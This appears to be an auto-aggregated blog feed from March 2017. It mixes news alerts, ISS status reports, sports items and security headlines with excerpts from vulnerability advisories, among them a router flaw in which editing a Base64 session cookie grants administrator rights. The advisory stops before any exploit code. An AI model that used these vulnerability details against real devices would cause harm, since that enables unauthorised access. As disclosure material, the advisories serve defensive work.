Latest YouTube Video

Saturday, March 25, 2017

Anonymous Coach: 'Great Hire' For IU In Archie Miller

Anonymous Coach: 'Great Hire' For IU In Archie Miller. Jordan Wells | Staff Writer. With the news of Indiana hiring (now former) Dayton head coach ...

from Google Alert - anonymous http://ift.tt/2o45vPo
via IFTTT

Anonymous witness testifies in murder case

An anonymous witness gave police information that led to the arrests of two men shortly after a man was murdered off East Street, a supreme court jury ...

from Google Alert - anonymous http://ift.tt/2nzhyXd
via IFTTT

Wilton album, folio 68: The Holy family, the Christ child reaching over the Virgin Mary's left shoulder ...

Artist: Anonymous. Artist: After Guido Reni (Italian, Bologna 1575–1642 Bologna). Date: ca. 1600–42. Medium: Etching. Dimensions: Sheet (Trimmed): ...

from Google Alert - anonymous http://ift.tt/2oh4qTR
via IFTTT

Ravens: Will Timmy Jernigan be traded this offseason? Barring tremendous offer, smart play is to hold onto him - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Fraudsters Using GiftGhostBot Botnet to Steal Gift Card Balances

Gift cards have once again caused quite a headache for retailers, as cyber criminals are using a botnet to break into and steal cash from money-loaded gift cards provided by major retailers around the globe. Dubbed GiftGhostBot, the new botnet specializing in gift card fraud is an advanced persistent bot (APB) that has been spotted in the wild by cyber security firm Distil Networks.


from The Hacker News http://ift.tt/2nhjuBG
via IFTTT

I have a new follower on Twitter


Cash Flow Chimp
Be Honest, Have Integrity, And Do What You Said You'd Do
Anaheim, CA
https://t.co/Mta3VVYUNq
Following: 1914 - Followers: 2105

March 25, 2017 at 09:02AM via Twitter http://twitter.com/ChimpFlow

My self-directed IRA

You shouldn't necessarily "Do it" but I'm doing it and find it fun and maybe profitable as well.

from Google Alert - anonymous http://ift.tt/2o2m5zp
via IFTTT

I have a new follower on Twitter


Ester Figueroa
Looking for a faster way to get thousands of Soundcloud views? or Twitter followers? This website can help you https://t.co/EZL1gnreux
Guatemala

Following: 2767 - Followers: 61

March 25, 2017 at 03:20AM via Twitter http://twitter.com/ejuqizoducaguj

Friday, March 24, 2017

NFL Draft: Michigan's Taco Charlton met with Ravens Thursday night - Michael Rothstein; Todd McShay's No. 17 prospect (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous

Find & apply online for the latest Jobs from Anonymous with reed.co.uk, the UK's #1 job site.

from Google Alert - anonymous http://ift.tt/2oe4Fio
via IFTTT

ISS Daily Summary Report – 3/23/2017

Space Headaches Questionnaire: The crew performed their weekly questionnaire, answering questions using the Data Collection Tool. This European Space Agency (ESA) investigation collects information that may help in the development of methods to alleviate associated symptoms and improve the well-being and performance of crewmembers in space. Headaches during space flight can negatively affect the mental and physical capacities of crewmembers, which can influence performance during a space mission.

MagVector Closeout: The crew completed closeout and cleanup activities for Science Run #9 of MagVector. The run was initiated on March 16, 2017 and has been ongoing for a week. MagVector and the venting system will subsequently be deactivated until a new science run is initiated. Cleanup steps included verifying the experiment had finished, moving the external USB memory drive to a Space Station Computer (SSC) for downlink, and powering off the MagVector. The investigation studies how Earth’s magnetic field interacts with an electrical conductor. Using extremely sensitive magnetic sensors placed around and above a conductor, researchers can gain insight into ways that the magnetic field influences how conductors work. This research not only helps improve future ISS experiments and electrical experiments, but it could offer insights into how magnetic fields influence electrical conductors in general, the backbone of our technology.

Remote Power Control Module (RPCM) LAS52A3B-A RPC 4 Remove & Replace (R&R): On March 17, 2017, this RPC, which powers Common Video Interface Unit (CVIU) 4, failed to close when commanded. The fault signature was indicative of a Field Effect Transistor (FET) Controller Hybrid (FCH) failure. The crew was successful in replacing the RPCM this morning, restoring functionality to RPC 4 and CVIU 4.
Extravehicular Activity (EVA) #40 Preparations: The crew completed the following in preparation for tomorrow’s EVA:
Configured 2 EVA GoPro cameras.
Relocated Station Support Computers (SSCs) 8 and 9 in the US Lab for EVA video.
Updated procedures in the EVA Systems Checklist book.
Configured EVA tools.
Performed a procedures review followed by a conference with ground teams.
Prepared the Equipment Lock, EMUs, and required ancillary hardware.

Today’s Planned Activities
All activities were completed unless otherwise noted.
Test video recording for RT TV channel
Preparation of Reports for Roscosmos Web Site and Social Media
URAGAN. Observation and photography
EKON-M. Observations and photography
Biochemical Urine Test
Extravehicular Activity (EVA) Reminder for On-Orbit Fitcheck Verification (OFV)
NEUROIMMUNITET. Saliva Sample. Psychological Test (morning)
Biochemical Urine Test
NEUROIMMUNITET. Venous blood sample processing (smear)
KORREKTSIYA. NEUROIMMUNITET. Venous blood sample processing using Plasma-03 centrifuge
Insertion of Russian experiments blood samples into MELFI
URISYS Hardware Stowage
On MCC GO Regeneration of БМП Ф2 Micropurification Cartridge (start)
Health Maintenance System (HMS) Periodic Health Status (PHS) Pre EVA Examination
Changeout of Replaceable Condensate Removal Lines [СМОК]
Replacing ИДЭ-3 Smoke Detectors in FGB
Regenerative Environmental Control and Life Support System (RGN) Wastewater Storage Tank Assembly (WSTA) Fill
NEUROIMMUNITET. Psychological Test
Relocate Station Support Computers (SSCs) 8 and 9 in the US Lab
NEUROIMMUNITET. Hair Samples Collection
Recharging Soyuz 733 Samsung PC Battery (if charge level is below 80%)
In-flight Maintenance (IFM) LAB1S5 Remote Power Controller Module (RPCM) Remove and Replace
BIOCARD. Experiment Session
EVA Systems book and Extravehicular Mobility Unit (EMU) Cuff Checklist Print
Extravehicular Activity (EVA) Tool Configuring
PILLE dosimeter data download and placement before USOS EVA
ISS HAM Service Module Pass
Terminate Soyuz 733 Samsung PC Battery Charge (as necessary)
Recharging Soyuz 732 Samsung PC Battery (if charge level is below 80%)
USB Jumpdrive Return and PPS1 Reconfiguration
RGN WSTA Fill
Robotic Workstation (RWS) Setup
Changeout of Replaceable Condensate Removal Lines [СМОК]
Extravehicular Activity (EVA) iPad Contingency Procedures preparation
Photo TV GoPro Setup
MOTOCARD. Experiment Ops
Extravehicular Activity (EVA) Procedure Review
Equipment Lock (E-LK) Preparation
RS Comm Panel Head set and PTT switch audit
Terminate Soyuz 732 Samsung PC Battery Charge (as necessary)
Extravehicular Activity (EVA) Tool Audit
INTERACTION-2. Experiment Ops
Space Headaches – Weekly Questionnaire
NEUROIMMUNITET. Saliva Sample. Psychological Test
On MCC GO Regeneration Micropurification Unit (БМП) Ф2 Absorption Cartridge

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
EVA preparation activities

Three-Day Look Ahead:
Friday, 03/24: EPIC MDM/SPDM Lube EVA, Orbital-7 Launch
Saturday, 03/25: Crew off duty, EMU water recharge, EVA debrief, Fluid Shifts h/w gather
Sunday, 03/26: Crew off duty, N2 CBCS powerup, PMA3 relocate

QUICK ISS Status – Environmental Control Group:
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Standby
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): ReProcess
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/2ocQxpt
via IFTTT

Google Chrome to Distrust Symantec SSLs for Mis-issuing 30,000 EV Certificates

Google announced its plans to punish Symantec by gradually distrusting its SSL certificates after the company was caught improperly issuing 30,000 Extended Validation (EV) certificates over the past few years. The Extended Validation (EV) status of all certificates issued by Symantec-owned certificate authorities will no longer be recognized by the Chrome browser for at least a year until


from The Hacker News http://ift.tt/2mXOXXy
via IFTTT

[FD] Defense in depth -- the Microsoft way (part 46): no checks for common path handling errors in "Application Verifier"

Anonymous Crew eye K2 million Kajive prize money

Mzuzu-based dance group Anonymous Crew has said dance entertainment is a great way of adding life and excitement to any event. The versatile ...

from Google Alert - anonymous http://ift.tt/2nKCKtZ
via IFTTT

anonymous on Behance

Showcase and discover the latest work from top online portfolios by creative professionals across industries.

from Google Alert - anonymous http://ift.tt/2mXGPXa
via IFTTT

IN RE: JOSE DH-P. (Anonymous)

Case opinion for NY Supreme Court IN RE: JOSE D. H.-P. (Anonymous). Read the Court's full decision on FindLaw.

from Google Alert - anonymous http://ift.tt/2nKTlO2
via IFTTT

7 minutes ago

... (via payment trail) would result in removal? I am unfamiliar with the intricacies of the verified account system, so perhaps large anonymous users are ...

from Google Alert - anonymous http://ift.tt/2mXIXhq
via IFTTT

Internetaholics Anonymous

Your name was given to us by a spouse or family member who is concerned about your internet addiction. At Internetaholics Anonymous, we can help.

from Google Alert - anonymous http://ift.tt/2nKCJWX
via IFTTT

US Senate Just Voted to Let ISPs Sell Your Web Browsing Data Without Permission

The ISPs can now sell certain sensitive data like your browsing history without permission, thanks to the US Senate. The US Senate on Wednesday voted, with 50 Republicans for it and 48 Democrats against, to roll back a set of broadband privacy regulations passed by the Federal Communication Commission (FCC) last year when it was under Democratic leadership. In October, the Federal


from The Hacker News http://ift.tt/2mXpnlB
via IFTTT

Thursday, March 23, 2017

We will have this ou

We will have this out for servo control class. #towsonmakerspace http://ift.tt/2mYiK3l



from Patrick McGuire http://ift.tt/2o8Rzmj
via IFTTT

Exclusive: Wikileaks reveals CIA's MacOS and iPhone Hacking Techniques

As part of its "Vault 7" series, Wikileaks has just released another batch of classified information that focused on exploits, hacking tools and techniques CIA created to hack Apple MacBook and iOS devices. Dubbed "Dark Matter," this second batch of CIA revelation contains five documents on Mac and iPhone hacks developed by the CIA. The hacking tools and techniques were developed by the


from The Hacker News http://ift.tt/2nVxOjd
via IFTTT

ISS Daily Summary Report – 3/22/2017

As mentioned at the IMMT this morning, the teams have been assessing their ability to support 2 EVAs and the PMA3 relocation prior to the arrival of OA-7. This was reviewed at the Inc 50 JOP this afternoon and no issues were identified. Based on this and the IMMT Chair’s approval, we have baselined the following plan:
March 24 – EVA1 (EPIC MDM and SPDM LEE Lube)
March 26 – PMA3 Relocation from N3 to N2
March 30 – EVA2 (EPIC MDM and Shields)
April 2 – OA7 Capture/Berthing
April 6 – EVA3 (ExPCA R&R)
The OA7 launch date is currently under review. Once OATK and ULA determine their launch date, we will re-assess the Apr 2 OA7 capture/berth date and the Apr 6 EVA date as required.

from ISS On-Orbit Status Report http://ift.tt/2nr7gZi
via IFTTT

Sunny today! With a

Sunny today! With a high of 47F and a low of 32F.



from Patrick McGuire http://ift.tt/2o8766b
via IFTTT

Russian Hacker Pleads Guilty to Developing and Distributing Citadel Trojan

A Russian man accused of developing and distributing the Citadel malware, which infected nearly 11 Million computers globally and caused over $500 Million in losses, has finally pleaded guilty to charges of computer fraud. Mark Vartanyan, 29, who was very well known as "Kolypto," pleaded guilty in an Atlanta courtroom on Monday to charges related to computer fraud and is now co-operating with


from The Hacker News http://ift.tt/2nfONON
via IFTTT

Minimum Antarctic Sea Ice 2017

This year's record low annual sea ice minimum of 2.11 million square kilometers was below the previous lowest minimum extent in the satellite record, which occurred in 1997. Antarctic sea ice saw an early maximum extent in 2016, followed by a very rapid loss of ice starting in early September. Since November, daily Antarctic sea ice extent has continuously been at its lowest levels in the satellite record. The ice loss slowed down in February. "There's a lot of year-to-year variability in both Arctic and Antarctic sea ice, but overall, until last year, the trends in the Antarctic for every single month were toward more sea ice," said Claire Parkinson, a senior sea ice researcher at Goddard. "Last year was stunningly different, with prominent sea ice decreases in the Antarctic. To think that now the Antarctic sea ice extent is actually reaching a record minimum, that's definitely of interest." The images shown here portray the sea ice as it was observed by the AMSR2 instrument onboard the Japanese Shizuku satellite. The opacity of the sea ice is derived from the AMSR2 sea ice concentration. The blueish white color of the sea ice is derived from the AMSR2 89 GHz brightness temperature. In some of the images, the Landsat Image Mosaic of Antarctica is shown over the continent.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2muRY6t
via IFTTT

Arctic Daily Sea Ice Concentration from Arctic Minimum 2016 to Arctic Maximum 2017

This animation shows the seasonal change in the extent of the Arctic sea ice between the Arctic minimum, September 10, 2016, and the Arctic maximum on March 7, 2017. Arctic sea ice appears to have reached a record low wintertime maximum extent, according to scientists at NASA and the NASA-supported National Snow and Ice Data Center (NSIDC) in Boulder, Colo. This winter, a combination of warmer-than-average temperatures, winds unfavorable to ice expansion, and a series of storms halted sea ice growth in the Arctic. This year's maximum extent, reached on March 7 at 5.57 million square miles (14.42 million square kilometers), is only about 40,000 square miles below the previous record low, which occurred in 2016. The images shown here portray the sea ice as it was observed by the AMSR2 instrument onboard the Japanese Shizuku satellite. The opacity of the sea ice is derived from the AMSR2 sea ice concentration. The blueish white color of the sea ice is derived from the AMSR2 89 GHz brightness temperature. The annual cycle starts with the minimum extent reached on August 31, 2016 and runs through the daily sea ice concentration until the maximum occurs on March 3, 2017. The Arctic's sea ice maximum extent has dropped by an average of 2.8 percent per decade since 1979, the year satellites started measuring sea ice. The summertime minimum extent losses are nearly five times larger: 13.5 percent per decade. Besides shrinking in extent, the sea ice cap is also thinning and becoming more vulnerable to the action of ocean waters, winds and warmer temperatures.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2mWQWfN
via IFTTT
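The extent figures quoted in the two sea-ice items above mix square miles and square kilometers; a quick arithmetic cross-check (using the standard conversion factor, 1 square mile = 2.58999 square kilometers) confirms they are mutually consistent:

```python
# Consistency check of the sea-ice figures quoted above.
SQ_MI_TO_SQ_KM = 2.58999  # standard mile^2 -> km^2 conversion

max_extent_sq_mi = 5.57e6  # 2017 Arctic maximum, square miles
max_extent_sq_km = max_extent_sq_mi * SQ_MI_TO_SQ_KM
# ~14.43 million sq km, matching the quoted 14.42 million within rounding
print(f"{max_extent_sq_km / 1e6:.2f} million sq km")

gap_sq_mi = 40_000  # margin below the 2016 record low
print(f"{gap_sq_mi * SQ_MI_TO_SQ_KM:,.0f} sq km")  # about 103,600 sq km
```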

I have a new follower on Twitter


Diego Callazans
poeta brasileiro contemporâneo. anarquista, vegano, pagão/politeísta. esteja avisado.

https://t.co/3Wv9vrsCZF
Following: 600 - Followers: 448

March 23, 2017 at 03:35AM via Twitter http://twitter.com/diegocallazans

Wednesday, March 22, 2017

Kiper Mock Draft 3.0: Ravens grab Wisconsin OT Ryan Ramczyk at No. 16; "considered one of the top three offensive tackles in the draft" - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous Individual Donates $4M to Pay Off PA Church's Mortgage

An historic African American church in Pennsylvania recently received the blessing of a lifetime. “We got a call from Citizens […]

from Google Alert - anonymous http://ift.tt/2nSB7rf
via IFTTT

One Anonymous Bloke

One: Slater and Co initially... sorts is an activist authorities don't dare arrest because... when he knows certain anonymous people have records of ...mr ...

from Google Alert - anonymous http://ift.tt/2nJYeaB
via IFTTT

Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan

Chinese hackers have taken the Smishing attack to the next level, using rogue cell phone towers to distribute Android banking malware via spoofed SMS messages. SMiShing — phishing attacks sent via SMS — is a type of attack wherein fraudsters use number spoofing attacks to send convincing bogus messages to trick mobile users into downloading a malware app onto their smartphones or lure victims


from The Hacker News http://ift.tt/2o4WTan
via IFTTT

"I am a guy of swagger" - Tony Jefferson used Madden to see himself in different jerseys before signing with Ravens - NFL.com (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens TE Dennis Pitta took $2.5M pay cut for next 2 seasons to remain with team, was to make $5.5M each year - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/21/2017

Intracranial Pressure & Visual Impairment (IPVI): The crew obtained both front-on and profile view pictures to check for facial edema, followed by a conference with ground teams. Scheduled at Launch + 4 months (L+4m), the IPVI investigation studies changes to crewmembers’ eyes and optic nerves by analyzing arterial blood pressure and blood flow to the brain before and after spaceflight. The IPVI investigation uses non-invasive methods, as compared to current invasive methods (spinal tap), to measure intracranial pressure.

Extravehicular Activity (EVA) #40 Preparations: The crew participated in a briefing covering the following preparations:
Crew member specific reminders
Suit specifics and refreshers
Key points in an emergency
EVA day procedure sequence
EVA day comm overview for suits
Hardware management

The crew also performed the following:
Onboard Training (OBT) EVA Robotics Onboard Trainer (ROBoT) session.
Verified Simplified Aid for EVA Rescue (SAFER) is functional prior to EVA.
Installed Rechargeable EVA Battery Assembly (REBA) in EMUs 3006 and 3008.
Verified EMU 3006 and 3008 glove heater functionality.

Environmental Health System (EHS) Surface Sample Kit (SSK), Microbial Air Sampler (MAS): The crew pre-gathered items for MAS and SSK sampling planned for tomorrow.

Mobile Servicing System (MSS) Operations: Yesterday and overnight, Robotics Ground Controllers powered up the MSS and walked the Space Station Remote Manipulator System (SSRMS) off the Lab Power Data Grapple Fixture (PDGF) onto the Functional Cargo Block (FGB) PDGF. They then performed a survey of the starboard side of 48 Soyuz (48S). When the survey was completed, Controllers walked the SSRMS off the FGB PDGF onto the Lab PDGF and maneuvered the SSRMS to a park position. MSS performance was nominal.

Tracking and Data Relay Satellite (TDRS) 275 Recovery: Overnight, TDRS 275 returned to service for S-Band and Ku-Band. The communications satellite had been out of service due to a timeout event that occurred on 3/16/17. The TDRS Network continues to investigate the root cause of the anomaly.

Today’s Planned Activities
All activities were completed unless otherwise noted.
KORREKTSIYA. Logging Liquid and Food (Medicine) Intake
MORZE. Logging Liquid and Food (Medicine) Intake
Photography of RS windows (3, 5, 6, 7, 8, 9, 26 in SM)
VIZIR. Experiment set up and start using СКПИ P/L
Diagnostics of FGB Power Supply System Filter Units (БФ-2) and Main Bus Assembly (БСШ-2) with Infra-Red camera
Monitoring RS structural shell surfaces using Multipurpose Eddy Current Device МВП-2К (Cross-section of SA setup)
Collecting atmospheric condensate samples [КАВ] from [СРВ-К2М] up to Gas-Liquid Mixture Filter (ФГС) to Russian Samplers, terminate
Sampling atmospheric condensate [КАВ] upstream of СРВ-К2М БКО (Water Purification Column Unit), configuration set up, sampler installation (drink bag)
Data prep on monitoring RS structural surfaces for downlink via OCA
In Flight Maintenance (IFM) Waste and Hygiene Compartment (WHC) Full Fill
Sampling atmospheric condensate [КАВ] upstream of БКО СРВ-К2М, Sampler Change out (drink bag)
Intracranial Pressure & Visual Impairment (IPVI) Face Photo-taking
ASEPTIC. Samples photo after incubation
БРП-М water sampling to drink bags
VIZIR. СКПИ Closeout Ops
Charging EVA Camera D4 Battery
Extravehicular Activity (EVA) Procedure Review
SVO-ZV water sampling to Russian drink bags
ASEPTIC Photo Edit and Downlink
Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ
Preparing for Changing Replaceable Condensate Removal Lines
ASEPTIC. Cryogem-03 Removal
Delta file prep
MORZE. Experiment setup
Extravehicular Activity (EVA) Airlock Unstow
Simplified Aid For EVA Rescue (SAFER) Checkout
On-board Training (OBT) EVA Robotics Onboard Trainer (ROBoT) Session
Robotic Workstation (RWS) Teardown
Surface Sampler Kit (SSK) and Microbial Air Sampler (MAS) Gather
Rechargeable EVA Battery Assembly (REBA) Installation
Sampling Condensate Water [КАВ] upstream of [СРВК-2М] БКО (Water Purification Column Unit), sampler (drink bag) removal, configuration teardown
Rechargeable EVA Battery Assembly (REBA) Powered Hardware Checkout

Completed Task List Items
ARED Detent Follow Up (Completed GMT 79)
Carbon Dioxide Monitor (CDM) Set-up (Completed GMT 79)
ESA Active Dosimeter Area Monitoring Mobile Unit Stow (Completed GMT 79)
EVA Fluid QD Fam (Completed GMT 79)
Crew evaluation of EveryWear Medical Module Medication list (Completed GMT 79)
PMM Cleanup (Completed GMT 79)
Carbon Dioxide Monitor (CDM) Data Download (Completed GMT 79 and 80)

Ground Activities
All activities were completed unless otherwise noted.
ROBoT OBT support
SSRMS walkoff from N2 PDGF A to MBS3

Three-Day Look Ahead:
Wednesday, 03/22: MELFI Icebrick Install, MSL SCA Exchange, Surface/Microbial Sampling, BEAM Ingress/Google Streetview, EVA Preps (ROBoT, Camera Config), CMO OBT
Thursday, 03/23: EVA Preps (Procedure Review/Conf, Tool Config, Equip Lock Prep, Tool Audit)
Friday, 03/24: EPIC MDM/SPDM Lube EVA, Orbital-7 Launch

QUICK ISS Status – Environmental Control Group:
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Standby
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): ReProcess
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/2nmPN3R
via IFTTT

Hackers Threaten to Remotely Wipe 300 Million iPhones Unless Apple Pays Ransom

If you use iCloud to sync your Apple devices, your private data may be at risk of getting exposed or deleted by April 7th. It has been found that a mischievous group of hackers claiming to have access to over 300 million iCloud accounts is threatening to remotely wipe data from those millions of Apple devices unless Apple pays it $75,000 in crypto-currency or $100,000 worth of iTunes


from The Hacker News http://ift.tt/2nAPUcL
via IFTTT

I have a new follower on Twitter


Crowdfunding Promo
I help people spread out word about their crowdfunding projects on websites like #Indiegogo #kickstarter and #others My online office is at link bellow:
New York
http://t.co/as4BeseoqU
Following: 16735 - Followers: 141222

March 22, 2017 at 06:05AM via Twitter http://twitter.com/Crowdfund_Promo

[FD] SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices

SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
=======================================================================
title: Multiple vulnerabilities
product: Solare Datensysteme GmbH Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
fixed version: Firmware 3.5.3-86
CVE number: -
impact: Critical
homepage: http://ift.tt/2mTDiK6
found: 2017-01-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
http://ift.tt/1mGHMNR
=======================================================================
Vendor description:

Source: Gmail -> IFTTT-> Blogger

Improvisers Anonymous comedy at ImproFest

Improvisers Anonymous are a London-based improvisation group, holding an event on Monday 27th March 2017 at 7pm. They aim to have a full audience.

from Google Alert - anonymous http://ift.tt/2mTtEav
via IFTTT

Unpatchable 'DoubleAgent' Attack Can Hijack All Windows Versions — Even Your Antivirus!

A team of security researchers from Cybellum, an Israeli zero-day prevention firm, has discovered a new Windows vulnerability that could allow hackers to take full control of your computer. Dubbed DoubleAgent, the new injecting code technique works on all versions of Microsoft Windows operating systems, starting from Windows XP to the latest release of Windows 10. What's worse? DoubleAgent


from The Hacker News http://ift.tt/2mTmVND
via IFTTT

Tuesday, March 21, 2017

bind vs anonymous function

bind vs anonymous function. JavaScript performance comparison. Test case created by Brad Bohen 7 minutes ago ...

from Google Alert - anonymous http://ift.tt/2mSaKko
via IFTTT
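The alert above points at a JavaScript jsPerf test comparing Function.prototype.bind against an anonymous wrapper function. A rough Python analogue of the same comparison, using functools.partial as the stand-in for bind (this sketch is illustrative only, not the jsPerf test case itself):

```python
# "bind vs anonymous function", Python edition: pre-binding an argument
# with functools.partial vs. wrapping the call in an anonymous lambda.
import timeit
from functools import partial

def add(a, b):
    return a + b

bound = partial(add, 1)      # like fn.bind(null, 1) in JavaScript
anon = lambda b: add(1, b)   # like an anonymous wrapper function

assert bound(2) == anon(2) == 3  # both compute the same result

# Time each variant over many calls; relative numbers vary by runtime.
t_bound = timeit.timeit(lambda: bound(2), number=200_000)
t_anon = timeit.timeit(lambda: anon(2), number=200_000)
print(f"partial: {t_bound:.3f}s  lambda: {t_anon:.3f}s")
```

As with the jsPerf test, the interesting question is overhead per call, so both variants are timed doing identical work.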

user.role.anonymous.yml

8.2.x core/modules/user/config/install/user.role.anonymous.yml · 8.0.x core/modules/user/config/install/user.role.anonymous.yml · 8.1.x ...

from Google Alert - anonymous http://ift.tt/2mqsln6
via IFTTT

Andrew Napolitano absent from Fox after citing anonymous spying claims

Fox News pulls Judge Napolitano over his Trump wiretap claims — Judge Andrew Napolitano, the senior judicial analyst for Fox News, is being kept ...

from Google Alert - anonymous http://ift.tt/2nPg9cK
via IFTTT

Anonymous feedback can encourage criticism and blame

360 reviews and other forms of anonymous feedback have their place, but they shouldn't be a default mechanism because they have their own flaws ...

from Google Alert - anonymous http://ift.tt/2nHd3dR
via IFTTT

Ravens have pre-draft visit set up with Washington's John Ross - NFL Network; Todd McShay's projects WR to Baltimore at No. 16 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Sandra Johns
if you like my body try this web chat with me https://t.co/uFmNiH8Kpx

https://t.co/uFmNiH8Kpx
Following: 98 - Followers: 0

March 21, 2017 at 11:30AM via Twitter http://twitter.com/niyf9yak75lyd

How Orioles closer Zach Britton accidentally became the new Mariano Rivera - Jayson Stark (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

NFL Free Agency: Colts will sign WR Kamar Aiken to one-year deal, according to his agent; 128 catches, 9 TD over last 3 seasons with Ravens (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/20/2017

With the decision today to move the OA7 launch to NET March 27, we have decided to move the IMMT OA7 Readiness Review from March 22 to March 27.  We will have the IMMT OA7 RR at 08:00 CDT on March 27 and if OA7 launches later that day, it would be around 18:49 CDT.   We will still have an IMMT this Wednesday, March 22, but the focus will be on the EVA Readiness Review, including the EPIC Ext R9 Transition Readiness Review.

from ISS On-Orbit Status Report http://ift.tt/2n3Gzrp
via IFTTT

I have a new follower on Twitter


Cody Warner Buck
Live a life that matters. Say what you mean, & don't be shy. Always remember where you came from and your purpose. Never let someone tell you your not worth it!
U.S.A Texas & Arkansas
https://t.co/xnnSTbKbYT
Following: 2177 - Followers: 10265

March 21, 2017 at 07:54AM via Twitter http://twitter.com/codywbuck

Searching for Leaked Celebrity Photos? Don't Blindly Click that Fappening Link!

Are you curiously googling or searching torrents for nude photos or videos of Emma Watson, Amanda Seyfried, Rose McGowan, or any other celebrities leaked in The Fappening 2.0? If yes, then beware: you should not click any link promising Fappening celebrity photos. Cybercriminals often take advantage of news headlines in order to trap victims and trick them into following links that may


from The Hacker News http://ift.tt/2nNsgXV
via IFTTT

TecnologiaLibre (@TecnologiaFree) retweeted your Tweet!

TecnologiaLibre retweeted your Tweet: @mistermcguire: [FD] Adium vulnerable to remote code execution via libpurple ift.tt/2n31gU6

Source: Gmail -> IFTTT-> Blogger

Updated: Justyne Caruana denies anonymous letter allegations about Gozo drug case

Parliamentary Secretary Justyne Caruana has denied having any connections with the Gozo drug case, after she was mentioned in an anonymous ...

from Google Alert - anonymous http://ift.tt/2n31zyb
via IFTTT

[FD] Adium vulnerable to remote code execution via libpurple

Adium is a popular instant messaging client for macOS (OS X) that incorporates libpurple. The current release (1.5.10.2) is vulnerable to CVE-2017-2640 in libpurple, which permits execution of arbitrary code on the client. The Adium team has been aware of the vulnerability since at least March 15, but has not released an advisory to its users, for reasons unknown. A post to the official developer's mailing list, which included vulnerability information and queries about Adium's process for handling upstream advisories from libpurple, has gone unanswered. Adium's build process documentation does not seem to include steps for upgrading or rebuilding libpurple, and the copy of libpurple checked into Adium's open-source repository is a binary blob of unknown provenance.

Source: Gmail -> IFTTT-> Blogger

Monday, March 20, 2017

I have a new follower on Twitter


Enrico Smiley
Member of NVIDIA Recruiting Team, keeping you up to date on #NVIDIA news and #careeropportunities. Opinions are my own. #deeplearning #engineering #gaming
Dinuba, CA
https://t.co/KMuHlgp32N
Following: 1981 - Followers: 1836

March 20, 2017 at 05:39PM via Twitter http://twitter.com/Enrico_Smiley

Re: [FD] Remote code execution via CSRF vulnerability in the web UI of Deluge 1.3.13

On 2017-03-05 07:22, Kyle Neideck wrote:
> Remote code execution via CSRF vulnerability in the web UI of Deluge 1.3.13
>
> Kyle Neideck, February 2017
>
> Product
>

Source: Gmail -> IFTTT-> Blogger

Re: [FD] SEC Consult SA-20170316-0 :: Authenticated command injection in multiple Ubiquiti Networks products

Re: [FD] 0-Day: Dahua backdoor Generation 2 and 3

Greetings, Based on a report made by NSFOCUS and my own research on shodan.io, I now know that an unbelievable number of vulnerable devices is out there: more than 1 million Dahua / OEM units. With this knowledge, I will not release the Python PoC to the public on April 5 as previously stated, as that is not necessary now that the PoC has already been verified by IPVM and other independent security researchers. However, I am open to sharing the PoC with serious security researchers if so desired; please e-mail me off list and be clear about who you are, so I do not take you for a beggar, which I ignore. NSFOCUS report: http://ift.tt/2nLv7QX /bashis

Source: Gmail -> IFTTT-> Blogger

Re: [FD] TS Session Hijacking / Privilege escalation all windows versions

[FD] Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router.

Title:
======
Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router.

CVE Details:
============
CVE-2017-6896

Reference:
==========
http://ift.tt/2n1AwDn
http://ift.tt/2n7mIce
http://ift.tt/2nWso6F

Credit:
======
Name: Indrajith.A.N
Website: http://ift.tt/2kISZqG

Date:
====
13-03-2017

Vendor:
======
The DIGISOL router is a product of Smartlink Network Systems Ltd., one of India's leading networking companies, established in 1993 to serve the Indian network-infrastructure market.

Product:
=======
DIGISOL DG-HR1400 is a wireless router.
Product link: http://ift.tt/2ls5tju

Abstract details:
=================
A privilege escalation vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker to escalate his USER privileges to ADMIN just by modifying the Base64-encoded session cookie value.

Affected Version:
=============
<=1.00.02

Exploitation-Technique:
===================
Remote

Severity Rating:
===================
8

Proof Of Concept 1:
==================
